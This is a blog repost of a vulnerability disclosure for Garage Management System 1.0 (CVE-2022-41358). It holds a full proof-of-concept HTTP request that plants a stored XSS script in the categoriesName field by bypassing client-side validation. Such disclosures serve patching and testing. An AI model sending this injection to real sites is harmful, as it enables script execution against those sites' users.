Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86368858

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS
# Date: 18-09-2022
# Exploit Author: Sam Wallace, SC
# Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2022-41358

Summary:
Garage Management System utilizes client side validation to prevent XSS.
Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
POC:
POST /garage/php_action/createCategories.php HTTP/1.1
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"
<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"
1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"
------WebKitFormBoundaryqKDsN4gmatTEEkhS--